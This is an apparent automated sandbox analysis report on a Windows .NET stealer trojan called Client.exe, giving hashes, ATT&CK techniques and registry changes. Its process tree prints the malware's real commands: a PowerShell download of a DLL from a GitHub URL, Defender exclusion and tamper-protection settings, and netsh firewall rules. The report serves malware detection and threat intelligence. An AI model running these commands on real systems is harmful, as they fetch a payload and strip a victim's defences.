62566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0

General

Target

Client.exe
Size

34KB
MD5

de2ff0cf683f97d87c97a84a0bdeb49e
SHA1

52a3d2012d8dde1e131f4c8e060d193e2f1237cf
SHA256

62566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0
SHA512

56c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e
SSDEEP

768:QpNkDJkjKB41eZuT0dm9joyZwPhtbPn9BX3qJKhSdN38:kNkDNB41eZw9jonR/9N3qJKhsh8

Score

10^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/2608-1-0x0000000001300000-0x000000000130E000-memory.dmp	disable_win_def
C:\ProgramData\Windows Security\$77-Windows Security Notification.exe	disable_win_def
behavioral1/memory/2896-5-0x0000000000910000-0x000000000091E000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

$77-Windows Security Notification.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	$77-Windows Security Notification.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	$77-Windows Security Notification.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	$77-Windows Security Notification.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	$77-Windows Security Notification.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 3032 powershell.exe
6 3032 powershell.exe
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

2660 netsh.exe
2724 netsh.exe

flow	pid	process
5	3032	powershell.exe
6	3032	powershell.exe

pid	process
2660	netsh.exe
2724	netsh.exe

Drops startup file 2 IoCs

Processes:

$77-Windows Security Notification.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe	$77-Windows Security Notification.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Windows Security Notification.exe	$77-Windows Security Notification.exe

Executes dropped EXE 1 IoCs

Processes:

$77-Windows Security Notification.exe

pid process

2896 $77-Windows Security Notification.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2896	$77-Windows Security Notification.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

$77-Windows Security Notification.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	$77-Windows Security Notification.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	$77-Windows Security Notification.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

$77-Windows Security Notification.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe"	$77-Windows Security Notification.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-Windows Security Notification = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-Windows Security Notification.exe"	$77-Windows Security Notification.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

3032 powershell.exe
2360 powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Client.exeexplorer.exenetsh.exepowershell.exe$77-Windows Security Notification.exenetsh.execmd.exepowershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-Windows Security Notification.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$77-Windows Security Notification.exe

pid	process
3032	powershell.exe
576	powershell.exe
2360	powershell.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe
2896	$77-Windows Security Notification.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$77-Windows Security Notification.exe

description	pid	process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	576	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe
Token: 33	2896	$77-Windows Security Notification.exe
Token: SeIncBasePriorityPrivilege	2896	$77-Windows Security Notification.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

Client.exeexplorer.exe$77-Windows Security Notification.execmd.exe

description	pid	process	target process
PID 2608 wrote to memory of 2256	2608	Client.exe	explorer.exe
PID 2608 wrote to memory of 2256	2608	Client.exe	explorer.exe
PID 2608 wrote to memory of 2256	2608	Client.exe	explorer.exe
PID 2608 wrote to memory of 2256	2608	Client.exe	explorer.exe
PID 2672 wrote to memory of 2896	2672	explorer.exe	$77-Windows Security Notification.exe
PID 2672 wrote to memory of 2896	2672	explorer.exe	$77-Windows Security Notification.exe
PID 2672 wrote to memory of 2896	2672	explorer.exe	$77-Windows Security Notification.exe
PID 2672 wrote to memory of 2896	2672	explorer.exe	$77-Windows Security Notification.exe
PID 2896 wrote to memory of 2660	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2660	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2660	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2660	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2724	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2724	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2724	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 2724	2896	$77-Windows Security Notification.exe	netsh.exe
PID 2896 wrote to memory of 600	2896	$77-Windows Security Notification.exe	cmd.exe
PID 2896 wrote to memory of 600	2896	$77-Windows Security Notification.exe	cmd.exe
PID 2896 wrote to memory of 600	2896	$77-Windows Security Notification.exe	cmd.exe
PID 2896 wrote to memory of 600	2896	$77-Windows Security Notification.exe	cmd.exe
PID 600 wrote to memory of 3032	600	cmd.exe	powershell.exe
PID 600 wrote to memory of 3032	600	cmd.exe	powershell.exe
PID 600 wrote to memory of 3032	600	cmd.exe	powershell.exe
PID 600 wrote to memory of 3032	600	cmd.exe	powershell.exe
PID 2896 wrote to memory of 2360	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 2360	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 2360	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 2360	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 576	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 576	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 576	2896	$77-Windows Security Notification.exe	powershell.exe
PID 2896 wrote to memory of 576	2896	$77-Windows Security Notification.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\Windows Security\$77-Windows Security Notification.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2256

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2672
- C:\ProgramData\Windows Security\$77-Windows Security Notification.exe
  "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe"
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Drops startup file
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2660
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\ProgramData\Windows Security\$77-Windows Security Notification.exe" "$77-Windows Security Notification.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:2724
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:600
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','C:\ProgramData\Windows Security\r77-x64.dll');exit
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Netsh Helper DLL

1

T1546.007

Defense Evasion

Impair Defenses

3

T1562

Disable or Modify System Firewall

1

T1562.004

Disable or Modify Tools

Modify Registry

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Windows Security\$77-Windows Security Notification.exe

Filesize
34KB

MD5
de2ff0cf683f97d87c97a84a0bdeb49e

SHA1
52a3d2012d8dde1e131f4c8e060d193e2f1237cf

SHA256
62566a803d4f1d485a6df2a9fcd7af4861631e77785b973844e668dda51c74f0

SHA512
56c169cdf07c47ca5e0c51507c0c02b1d01a183c9536eb74eeb2e432cf954812a37a9af2974f0cc48cc5e2dadbab73c530e82e2048163c1c3389848b8e58da4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Rot.bat

Filesize
251B

MD5
eb42fd6dc5814aaaad5ae381e4c64cae

SHA1
9fc6655c50b8543fcab600256d104c33bc37f6bb

SHA256
ae65c56a9718326d6899262eea15044cf418b341472645098f68b6e3f0729068

SHA512
e2d7e8853a29b4a55d4797b3e340631d14af83e0bff3f2521b56a2435b92dbc2f5d101dbd4f516d23f6b136c62d65f1a9bd47268e0f209108967b85e3b70b17a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0b8ce7d770eeada310efd638b7be4825

SHA1
53362105625022c73d719898ae2dcf878fb3b856

SHA256
a484babcf4070a56a5d471ebe73dd90243d20a22e6a2f54040d0bc7e7100695d

SHA512
7bae5e34bfa3ca020898f19dac4f2769460fdec1ff045ba235c3d5964cf6dbcd3426989d834cb4ad397b1ee1342a7207a7c284aaaa97d2c5cd8a9294fce97734

Download Submit
memory/2608-1-0x0000000001300000-0x000000000130E000-memory.dmp

Filesize
56KB

Download
memory/2608-0-0x000000007497E000-0x000000007497F000-memory.dmp

Filesize
4KB

Download
memory/2896-29-0x0000000000840000-0x000000000084E000-memory.dmp

Filesize
56KB

Download
memory/2896-5-0x0000000000910000-0x000000000091E000-memory.dmp

Filesize
56KB

Download
memory/2896-30-0x0000000001EC0000-0x0000000001ECA000-memory.dmp

Filesize
40KB

Download
memory/2896-33-0x0000000005F70000-0x0000000006008000-memory.dmp

Filesize
608KB

Download
memory/2896-34-0x00000000067D0000-0x0000000006864000-memory.dmp

Filesize
592KB

Download
memory/2896-36-0x0000000004310000-0x000000000431E000-memory.dmp

Filesize
56KB

Download
memory/2896-37-0x0000000004330000-0x000000000433A000-memory.dmp

Filesize
40KB

Download
memory/2896-38-0x0000000004340000-0x000000000434C000-memory.dmp

Filesize
48KB

Download
memory/2896-39-0x00000000043B0000-0x00000000043BC000-memory.dmp

Filesize
48KB

Download
memory/2896-40-0x0000000004A20000-0x0000000004A3C000-memory.dmp

Filesize
112KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads